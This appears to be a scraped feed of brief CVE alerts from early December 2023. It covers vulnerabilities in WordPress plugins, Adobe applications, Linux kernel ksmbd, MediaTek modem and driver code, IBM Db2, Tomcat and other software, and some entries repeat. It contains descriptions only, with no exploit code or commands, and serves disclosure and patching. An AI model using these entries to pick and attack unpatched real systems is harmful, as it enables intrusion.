🚨 CVE-2023-24046An issue was discovered on Connectize AC21000 G6 641.139.1.1256 allows attackers to run arbitrary commands via use of a crafted string in the ping utility.🎖@cveNotify |
|
| 2023-12-04 23:30:12 |
🚨 CVE-2023-21403N/A🎖@cveNotify |
|
| 2023-12-04 23:30:08 |
🚨 CVE-2023-21401N/A🎖@cveNotify |
|
| 2023-12-04 23:30:07 |
🚨 CVE-2023-21227N/A🎖@cveNotify |
|
| 2023-12-04 23:30:02 |
🚨 CVE-2023-21216N/A🎖@cveNotify |
|
| 2023-12-04 23:30:01 |
🚨 CVE-2023-21166N/A🎖@cveNotify |
|
| 2023-12-04 23:29:57 |
🚨 CVE-2023-21164N/A🎖@cveNotify |
|
| 2023-12-04 23:29:56 |
🚨 CVE-2023-21394In registerPhoneAccount of TelecomServiceImpl.java, there is a possible way to reveal images from another user due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-04 22:30:09 |
🚨 CVE-2023-5951The Welcart e-Commerce WordPress plugin before 2.9.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-12-04 22:30:03 |
🚨 CVE-2023-5884The Word Balloon WordPress plugin before 4.20.3 does not protect some of its actions against CSRF attacks, allowing an unauthenticated attacker to trick a logged in user to delete arbitrary avatars by clicking a link.🎖@cveNotify |
|
| 2023-12-04 22:30:02 |
🚨 CVE-2023-5762The Filr WordPress plugin before 1.2.3.6 is vulnerable from an RCE (Remote Code Execution) vulnerability, which allows the operating system to execute commands and fully compromise the server on behalf of a user with Author-level privileges.🎖@cveNotify |
|
| 2023-12-04 22:30:01 |
🚨 CVE-2023-5210The AMP+ Plus WordPress plugin through 3.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-12-04 22:29:57 |
🚨 CVE-2023-5137The Simply Excerpts WordPress plugin through 1.4 does not sanitize and escape some fields in the plugin settings, which could allow high-privilege users such as an administrator to inject arbitrary web scripts even when the unfiltered_html capability is disallowed (for example in a multisite setup).🎖@cveNotify |
|
| 2023-12-04 22:29:56 |
🚨 CVE-2023-4460The Uploading SVG, WEBP and ICO files WordPress plugin through 1.2.1 does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.🎖@cveNotify |
|
| 2023-12-04 21:29:56 |
🚨 CVE-2023-47106Traefik is an open source HTTP reverse proxy and load balancer. When a request is sent to Traefik with a URL fragment, Traefik automatically URL encodes and forwards the fragment to the backend server. This violates RFC 7230 because in the origin-form the URL should only contain the absolute path and the query. When this is combined with another frontend proxy like Nginx, it can be used to bypass frontend proxy URI-based access control restrictions. This vulnerability has been addressed in versions 2.10.6 and 3.0.0-beta5. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-04 20:00:09 |
🚨 CVE-2023-29063The FACSChorus workstation does not prevent physical access to its PCI express (PCIe) slots, which could allow a threat actor to insert a PCI card designed for memory capture. A threat actor can then isolate sensitive information such as a BitLocker encryption key from a dump of the workstation RAM during startup.🎖@cveNotify |
|
| 2023-12-04 20:00:02 |
🚨 CVE-2023-49062Katran could disclose non-initialized kernel memory as part of an IP header. The issue was present for IPv4 encapsulation and ICMP (v4) Too Big packet generation. After a bpf_xdp_adjust_head call, Katran code didn’t initialize the Identification field for the IPv4 header, resulting in writing content of kernel memory in that field of IP header. The issue affected all Katran versions prior to commit 6a03106ac1eab39d0303662963589ecb2374c97f🎖@cveNotify |
|
| 2023-12-04 20:00:01 |
🚨 CVE-2023-5981A vulnerability was found that the response times to malformed ciphertexts in RSA-PSK ClientKeyExchange differ from response times of ciphertexts with correct PKCS#1 v1.5 padding.🎖@cveNotify |
|
| 2023-12-04 19:59:57 |
🚨 CVE-2023-6151Improper Privilege Management vulnerability in ESKOM Computer e-municipality module allows Collect Data as Provided by Users.This issue affects e-municipality module: before v.105.🎖@cveNotify |
|
| 2023-12-04 19:59:56 |
🚨 CVE-2023-34054In Reactor Netty HTTP Server, versions 1.1.x prior to 1.1.13 and versions 1.0.x prior to 1.0.39, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition.Specifically, an application is vulnerable if Reactor Netty HTTP Server built-in integration with Micrometer is enabled.🎖@cveNotify |
|
| 2023-12-04 19:30:09 |
🚨 CVE-2023-29060The FACSChorus workstation operating system does not restrict what devices can interact with its USB ports. If exploited, a threat actor with physical access to the workstation could gain access to system information and potentially exfiltrate data.🎖@cveNotify |
|
| 2023-12-04 19:30:02 |
🚨 CVE-2023-45286A race condition in go-resty can result in HTTP request body disclosure across requests. This condition can be triggered by calling sync.Pool.Put with the same *bytes.Buffer more than once, when request retries are enabled and a retry occurs. The call to sync.Pool.Get will then return a bytes.Buffer that hasn't had bytes.Buffer.Reset called on it. This dirty buffer will contain the HTTP request body from an unrelated request, and go-resty will append the current HTTP request body to it, sending two bodies in one request. The sync.Pool in question is defined at package level scope, so a completely unrelated server could receive the request body.🎖@cveNotify |
|
| 2023-12-04 19:30:01 |
🚨 CVE-2023-41264Netwrix Usercube before 6.0.215, in certain misconfigured on-premises installations, allows authentication bypass on deployment endpoints, leading to privilege escalation. This only occurs if the configuration omits the required restSettings.AuthorizedClientId and restSettings.AuthorizedSecret fields (for the POST /api/Deployment/ExportConfiguration and POST /api/Deployment endpoints).🎖@cveNotify |
|
| 2023-12-04 19:29:57 |
🚨 CVE-2023-46589Improper Input Validation vulnerability in Apache Tomcat.Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82 and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. A trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy.Users are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue.🎖@cveNotify |
|
| 2023-12-04 19:29:56 |
🚨 CVE-2023-6239Under rare conditions, the effective permissions of an object might be incorrectly calculated if the object has a specific configuration of metadata-driven permissions in M-Files Server versions 23.9, 23.10, and 23.11 before 23.11.13168.7, potentially enabling unauthorized access to the object.🎖@cveNotify |
|
| 2023-12-04 18:59:57 |
🚨 CVE-2023-6226The WP Shortcodes Plugin — Shortcodes Ultimate plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.13.3 via the su_meta shortcode due to missing validation on the user controlled keys 'key' and 'post_id'. This makes it possible for authenticated attackers, with contributor-level access and above, to retrieve arbitrary post meta values which may contain sensitive information when combined with another plugin.🎖@cveNotify |
|
| 2023-12-04 18:30:04 |
🚨 CVE-2023-37926A buffer overflow vulnerability in the Zyxel ATP series firmware versions 4.32 through 5.37, USG FLEX series firmware versions 4.50 through 5.37, USG FLEX 50(W) series firmware versions 4.16 through 5.37, USG20(W)-VPN series firmware versions 4.16 through 5.37, and VPN series firmware versions 4.30 through 5.37, could allow an authenticated local attacker to cause denial-of-service (DoS) conditions by executing the CLI command to dump system logs on an affected device.🎖@cveNotify |
|
| 2023-12-04 18:29:58 |
🚨 CVE-2023-37925An improper privilege management vulnerability in the debug CLI command of the Zyxel ATP series firmware versions 4.32 through 5.37, USG FLEX series firmware versions 4.50 through 5.37, USG FLEX 50(W) series firmware versions 4.16 through 5.37, USG20(W)-VPN series firmware versions 4.16 through 5.37, VPN series firmware versions 4.30 through 5.37, NWA50AX firmware version 6.29(ABYW.2), WAC500 firmware version 6.65(ABVS.1), WAX300H firmware version 6.60(ACHF.1), and WBE660S firmware version 6.65(ACGG.1), could allow an authenticated local attacker to access system files on an affected device.🎖@cveNotify |
|
| 2023-12-04 18:29:57 |
🚨 CVE-2023-48034An issue discovered in Acer Wireless Keyboard SK-9662 allows attacker in physical proximity to both decrypt wireless keystrokes and inject arbitrary keystrokes via use of weak encryption.🎖@cveNotify |
|
| 2023-12-04 18:29:56 |
🚨 CVE-2022-41951OroPlatform is a PHP Business Application Platform (BAP) designed to make development of custom business applications easier and faster. Path Traversal is possible in `Oro\Bundle\GaufretteBundle\FileManager::getTemporaryFileName`. With this method, an attacker can pass the path to a non-existent file, which will allow writing the content to a new file that will be available during script execution. This vulnerability has been fixed in version 5.0.9.🎖@cveNotify |
|
| 2023-12-04 18:00:06 |
🚨 CVE-2023-49078raptor-web is a CMS for game server communities that can be used to host information and keep track of players. In version 0.4.4 of raptor-web, it is possible to craft a malicious URL that will result in a reflected cross-site scripting vulnerability. A user controlled URL parameter is loaded into an internal template that has autoescape disabled. This is a cross-site scripting vulnerability that affects all deployments of `raptor-web` on version `0.4.4`. Any victim who clicks on a malicious crafted link will be affected. This issue has been patched 0.4.4.1.🎖@cveNotify |
|
| 2023-12-04 18:00:01 |
🚨 CVE-2023-2448The UserPro plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'userpro_shortcode_template' function in versions up to, and including, 5.1.4. This makes it possible for unauthenticated attackers to arbitrary shortcode execution. An attacker can leverage CVE-2023-2446 to get sensitive information via shortcode.🎖@cveNotify |
|
| 2023-12-04 18:00:00 |
🚨 CVE-2021-35991Adobe Bridge version 11.0.2 (and earlier) is affected by an Access of Uninitialized Pointer vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to disclose arbitrary memory information in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-04 17:30:16 |
🚨 CVE-2023-48815kkFileView v4.3.0 is vulnerable to Incorrect Access Control.🎖@cveNotify |
|
| 2023-12-04 17:30:15 |
🚨 CVE-2023-2449The UserPro plugin for WordPress is vulnerable to unauthorized password resets in versions up to, and including 5.1.1. This is due to the plugin using native password reset functionality, with insufficient validation on the password reset function (userpro_process_form). The function uses the plaintext value of a password reset key instead of a hashed value which means it can easily be retrieved and subsequently used. An attacker can leverage CVE-2023-2448 and CVE-2023-2446, or another vulnerability like SQL Injection in another plugin or theme installed on the site to successfully exploit this vulnerability.🎖@cveNotify |
|
| 2023-12-04 17:00:11 |
🚨 CVE-2023-2497The UserPro plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.1.0. This is due to missing or incorrect nonce validation on the 'import_settings' function. This makes it possible for unauthenticated attackers to exploit PHP Object Injection due to the use of unserialize() on the user supplied parameter via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-12-04 17:00:10 |
🚨 CVE-2023-38218Adobe Commerce versions 2.4.7-beta1 (and earlier), 2.4.6-p2 (and earlier), 2.4.5-p4 (and earlier) and 2.4.4-p5 (and earlier) are affected by an Incorrect Authorization . An authenticated attacker can exploit this to achieve information exposure and privilege escalation.🎖@cveNotify |
|
| 2023-12-04 16:30:40 |
🚨 CVE-2023-49287TinyDir is a lightweight C directory and file reader. Buffer overflows in the `tinydir_file_open()` function. This vulnerability has been patched in version 1.2.6.🎖@cveNotify |
|
| 2023-12-04 16:30:39 |
🚨 CVE-2023-47071Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-04 16:30:38 |
🚨 CVE-2023-47054Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-04 16:30:37 |
🚨 CVE-2023-47051Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-04 16:30:34 |
🚨 CVE-2023-47050Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-04 16:30:33 |
🚨 CVE-2023-47049Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-04 16:30:32 |
🚨 CVE-2023-47047Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-04 16:30:31 |
🚨 CVE-2023-47046Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-04 16:30:28 |
🚨 CVE-2023-47044Adobe Media Encoder version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-04 16:30:27 |
🚨 CVE-2023-44328Adobe Bridge versions 13.0.4 (and earlier) and 14.0.0 (and earlier) are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-04 16:30:26 |
🚨 CVE-2023-44360Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-04 16:30:22 |
🚨 CVE-2023-44357Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-04 16:30:21 |
🚨 CVE-2023-44340Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-04 15:00:08 |
🚨 CVE-2023-42000Arcserve UDP prior to 9.2 contains a path traversal vulnerability in com.ca.arcflash.ui.server.servlet.FileHandlingServlet.doUpload(). An unauthenticated remote attacker can exploit it to upload arbitrary files to any location on the file system where the UDP agent is installed.🎖@cveNotify |
|
| 2023-12-04 15:00:04 |
🚨 CVE-2023-6263An issue was discovered in Network Optix NxCloud before 23.1.0.40440. It was possible to add a fake VMS server to NxCloud by using the exact identification of a legitimate VMS server. As result, it was possible to retrieve authorization headers from legitimate users when the legitimate client connects to the fake VMS server.🎖@cveNotify |
|
| 2023-12-04 15:00:03 |
🚨 CVE-2023-32252A flaw was found in the Linux kernel's ksmbd, a high-performance in-kernel SMB server. The specific flaw exists within the handling of SMB2_LOGOFF commands. The issue results from the lack of proper validation of a pointer prior to accessing it. An attacker can leverage this vulnerability to create a denial-of-service condition on the system.🎖@cveNotify |
|
| 2023-12-04 15:00:02 |
🚨 CVE-2023-32248A flaw was found in the Linux kernel's ksmbd, a high-performance in-kernel SMB server. The specific flaw exists within the handling of SMB2_TREE_CONNECT and SMB2_QUERY_INFO commands. The issue results from the lack of proper validation of a pointer prior to accessing it. An attacker can leverage this vulnerability to create a denial-of-service condition on the system.🎖@cveNotify |
|
| 2023-12-04 14:59:58 |
🚨 CVE-2023-1295A time-of-check to time-of-use issue exists in io_uring subsystem's IORING_OP_CLOSE operation in the Linux kernel's versions 5.6 - 5.11 (inclusive), which allows a local user to elevate their privileges to root. Introduced in b5dba59e0cf7e2cc4d3b3b1ac5fe81ddf21959eb, patched in 9eac1904d3364254d622bf2c771c4f85cd435fc2, backported to stable in 788d0824269bef539fe31a785b1517882eafed93.🎖@cveNotify |
|
| 2023-12-04 14:59:57 |
🚨 CVE-2023-35826An issue was discovered in the Linux kernel before 6.3.2. A use-after-free was found in cedrus_remove in drivers/staging/media/sunxi/cedrus/cedrus.c.🎖@cveNotify |
|
| 2023-12-04 14:59:56 |
🚨 CVE-2022-45886An issue was discovered in the Linux kernel through 6.0.9. drivers/media/dvb-core/dvb_net.c has a .disconnect versus dvb_device_open race condition that leads to a use-after-free.🎖@cveNotify |
|
| 2023-12-04 14:30:15 |
🚨 CVE-2023-41613EzViz Studio v2.2.0 is vulnerable to DLL hijacking.🎖@cveNotify |
|
| 2023-12-04 14:00:44 |
🚨 CVE-2023-32860In display, there is a possible classic buffer overflow due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07929788; Issue ID: ALPS07929788.🎖@cveNotify |
|
| 2023-12-04 14:00:43 |
🚨 CVE-2023-32858In GZ, there is a possible information disclosure due to a missing data erasing. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07806008; Issue ID: ALPS07806008.🎖@cveNotify |
|
| 2023-12-04 14:00:42 |
🚨 CVE-2023-32856In display, there is a possible out of bounds read due to an incorrect status check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07993705; Issue ID: ALPS07993705.🎖@cveNotify |
|
| 2023-12-04 14:00:38 |
🚨 CVE-2023-32855In aee, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07909204; Issue ID: ALPS07909204.🎖@cveNotify |
|
| 2023-12-04 14:00:37 |
🚨 CVE-2023-32854In ril, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08240132; Issue ID: ALPS08240132.🎖@cveNotify |
|
| 2023-12-04 14:00:36 |
🚨 CVE-2023-32852In cameraisp, there is a possible information disclosure due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07670971; Issue ID: ALPS07670971.🎖@cveNotify |
|
| 2023-12-04 14:00:35 |
🚨 CVE-2023-32851In decoder, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS08016652; Issue ID: ALPS08016652.🎖@cveNotify |
|
| 2023-12-04 14:00:31 |
🚨 CVE-2023-32848In vdec, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08163896; Issue ID: ALPS08163896.🎖@cveNotify |
|
| 2023-12-04 14:00:30 |
🚨 CVE-2023-32846In 5G Modem, there is a possible system crash due to improper error handling. This could lead to remote denial of service when receiving malformed RRC messages, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01128524; Issue ID: MOLY01138453 (MSV-861).🎖@cveNotify |
|
| 2023-12-04 14:00:26 |
🚨 CVE-2023-32843In 5G Modem, there is a possible system crash due to improper error handling. This could lead to remote denial of service when receiving malformed RRC messages, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01130204; Issue ID: MOLY01130204 (MSV-849).🎖@cveNotify |
|
| 2023-12-04 14:00:25 |
🚨 CVE-2023-32842In 5G Modem, there is a possible system crash due to improper error handling. This could lead to remote denial of service when receiving malformed RRC messages, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01130256; Issue ID: MOLY01130256 (MSV-848).🎖@cveNotify |
|
| 2023-12-04 13:30:19 |
🚨 CVE-2023-48863SEMCMS 3.9 is vulnerable to SQL Injection. Due to the lack of security checks on the input of the application, the attacker uses the existing application to inject malicious SQL commands into the background database engine for execution, and sends some attack codes as commands or query statements to the interpreter. These malicious data can deceive the interpreter, so as to execute unplanned commands or unauthorized access to data.🎖@cveNotify |
|
| 2023-12-04 13:30:18 |
🚨 CVE-2023-47272Roundcube 1.5.x before 1.5.6 and 1.6.x before 1.6.5 allows XSS via a Content-Type or Content-Disposition header (used for attachment preview or download).🎖@cveNotify |
|
| 2023-12-04 09:30:04 |
🚨 CVE-2023-44305Dell DM5500 5.14.0.0, contains a Stack-based Buffer Overflow Vulnerability in PPOE. An unauthenticated remote attacker may exploit this vulnerability to crash the affected process or execute arbitrary code on the system by sending specially crafted input dat🎖@cveNotify |
|
| 2023-12-04 09:29:57 |
🚨 CVE-2023-44301Dell DM5500 5.14.0.0 and prior contain a Reflected Cross-Site Scripting Vulnerability. A network attacker with low privileges could potentially exploit this vulnerability, leading to the execution of malicious HTML or JavaScript code in a victim user's web browser in the context of the vulnerable web application. Exploitation may lead to information disclosure, session theft, or client-side request forgery.🎖@cveNotify |
|
| 2023-12-04 09:29:56 |
🚨 CVE-2023-44291Dell DM5500 5.14.0.0 contains an OS command injection vulnerability in PPOE component. A remote attacker with high privileges could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the underlying OS, with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker.🎖@cveNotify |
|
| 2023-12-04 07:29:59 |
🚨 CVE-2023-5332Patch in third party library Consul requires 'enable-script-checks' to be set to False. This was required to enable a patch by the vendor. Without this setting the patch could be bypassed. This only affects GitLab-EE.🎖@cveNotify |
|
| 2023-12-04 06:29:56 |
🚨 CVE-2023-49108Path traversal vulnerability exists in RakRak Document Plus Ver.3.2.0.0 to Ver.6.4.0.7 (excluding Ver.6.1.1.3a). If this vulnerability is exploited, arbitrary files on the server may be obtained or deleted by a user of the product with specific privileges.🎖@cveNotify |
|
| 2023-12-04 05:30:16 |
🚨 CVE-2023-49093HtmlUnit is a GUI-less browser for Java programs. HtmlUnit is vulnerable to Remote Code Execution (RCE) via XSTL, when browsing the attacker’s webpage. This vulnerability has been patched in version 3.9.0🎖@cveNotify |
|
| 2023-12-04 04:30:11 |
🚨 CVE-2023-32851In decoder, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS08016652; Issue ID: ALPS08016652.🎖@cveNotify |
|
| 2023-12-04 04:30:05 |
🚨 CVE-2023-32850In decoder, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS08016659; Issue ID: ALPS08016659.🎖@cveNotify |
|
| 2023-12-04 04:30:04 |
🚨 CVE-2023-32847In audio, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS08241940; Issue ID: ALPS08241940.🎖@cveNotify |
|
| 2023-12-04 04:30:03 |
🚨 CVE-2023-32846In 5G Modem, there is a possible system crash due to improper error handling. This could lead to remote denial of service when receiving malformed RRC messages, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01128524; Issue ID: MOLY01138453 (MSV-861).🎖@cveNotify |
|
| 2023-12-04 04:29:59 |
🚨 CVE-2023-32844In 5G Modem, there is a possible system crash due to improper error handling. This could lead to remote denial of service when receiving malformed RRC messages, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01128524; Issue ID: MOLY01130183 (MSV-850).🎖@cveNotify |
|
| 2023-12-04 04:29:58 |
🚨 CVE-2023-32841In 5G Modem, there is a possible system crash due to improper error handling. This could lead to remote denial of service when receiving malformed RRC messages, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01128524; Issue ID: MOLY01128524 (MSV-846).🎖@cveNotify |
|
| 2023-12-04 03:29:56 |
🚨 CVE-2018-14628An information leak vulnerability was discovered in Samba's LDAP server. Due to missing access control checks, an authenticated but unprivileged attacker could discover the names and preserved attributes of deleted objects in the LDAP store.🎖@cveNotify |
|
| 2023-12-04 03:00:16 |
🚨 CVE-2023-42676In imsservice, there is a possible way to write permission usage records of an app due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-04 03:00:09 |
🚨 CVE-2023-42674In imsservice, there is a possible way to write permission usage records of an app due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-04 03:00:08 |
🚨 CVE-2023-42671In imsservice, there is a possible way to write permission usage records of an app due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-04 03:00:03 |
🚨 CVE-2022-48464In wifi service, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-04 03:00:02 |
🚨 CVE-2023-40692IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, 11.5 is vulnerable to denial of service under extreme stress conditions. IBM X-Force ID: 264807.🎖@cveNotify |
|
| 2023-12-04 02:59:57 |
🚨 CVE-2023-49946In Forgejo before 1.20.5-1, certain endpoints do not check whether an object belongs to a repository for which permissions are being checked. This allows remote attackers to read private issues, read private pull requests, delete issues, and perform other unauthorized actions.🎖@cveNotify |
|
| 2023-12-04 02:59:56 |
🚨 CVE-2023-45178IBM Db2 for Linux, UNIX and Windows (includes DB2 Connect Server) 11.5 CLI is vulnerable to a denial of service when a specially crafted request is used. IBM X-Force ID: 268073.🎖@cveNotify |
|
| 2023-12-04 02:29:57 |
🚨 CVE-2023-40687IBM DB2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to denial of service with a specially crafted RUNSTATS command on an 8TB table. IBM X-Force ID: 264809.🎖@cveNotify |
|
| 2023-12-04 02:29:56 |
🚨 CVE-2023-29258IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.1, and 11.5 is vulnerable to a denial of service through a specially crafted federated query on specific federation objects. IBM X-Force ID: 252048.🎖@cveNotify |
|
| 2023-12-04 01:30:04 |
🚨 CVE-2023-42672In imsservice, there is a possible way to write permission usage records of an app due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-04 01:29:57 |
🚨 CVE-2022-48464In wifi service, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-04 01:29:56 |
🚨 CVE-2022-48462In wifi service, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-04 00:29:56 |
🚨 CVE-2023-40692IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, 11.5 is vulnerable to denial of service under extreme stress conditions. IBM X-Force ID: 264807.🎖@cveNotify |
|
| 2023-12-03 22:29:56 |
🚨 CVE-2023-5427Use After Free vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to make improper GPU processing operations to gain access to already freed memory.This issue affects Bifrost GPU Kernel Driver: from r44p0 through r45p0; Valhall GPU Kernel Driver: from r44p0 through r45p0; Arm 5th Gen GPU Architecture Kernel Driver: from r44p0 through r45p0.🎖@cveNotify |
|
| 2023-12-03 20:29:56 |
🚨 CVE-2021-39537An issue was discovered in ncurses through v6.2-1. _nc_captoinfo in captoinfo.c has a heap-based buffer overflow.🎖@cveNotify |
|
| 2023-12-03 19:29:57 |
🚨 CVE-2023-49947Forgejo before 1.20.5-1 allows 2FA bypass when docker login uses Basic Authentication.🎖@cveNotify |
|
| 2023-12-03 19:29:56 |
🚨 CVE-2022-4957A vulnerability was found in librespeed speedtest up to 5.2.4. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file results/stats.php. The manipulation of the argument id leads to cross site scripting. The attack can be launched remotely. Upgrading to version 5.2.5 is able to address this issue. The patch is named a85f2c086f3449dffa8fe2edb5e2ef3ee72dc0e9. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-246643.🎖@cveNotify |
|
| 2023-12-03 18:29:56 |
🚨 CVE-2023-45178IBM Db2 for Linux, UNIX and Windows (includes DB2 Connect Server) 11.5 CLI is vulnerable to a denial of service when a specially crafted request is used. IBM X-Force ID: 268073.🎖@cveNotify |
|
| 2023-12-03 17:00:16 |
🚨 CVE-2023-44382October is a Content Management System (CMS) and web platform to assist with development workflow. An authenticated backend user with the `editor.cms_pages`, `editor.cms_layouts`, or `editor.cms_partials` permissions who would normally not be permitted to provide PHP code to be executed by the CMS due to `cms.safe_mode` being enabled can write specific Twig code to escape the Twig sandbox and execute arbitrary PHP. This issue has been patched in 3.4.15.🎖@cveNotify |
|
| 2023-12-03 17:00:15 |
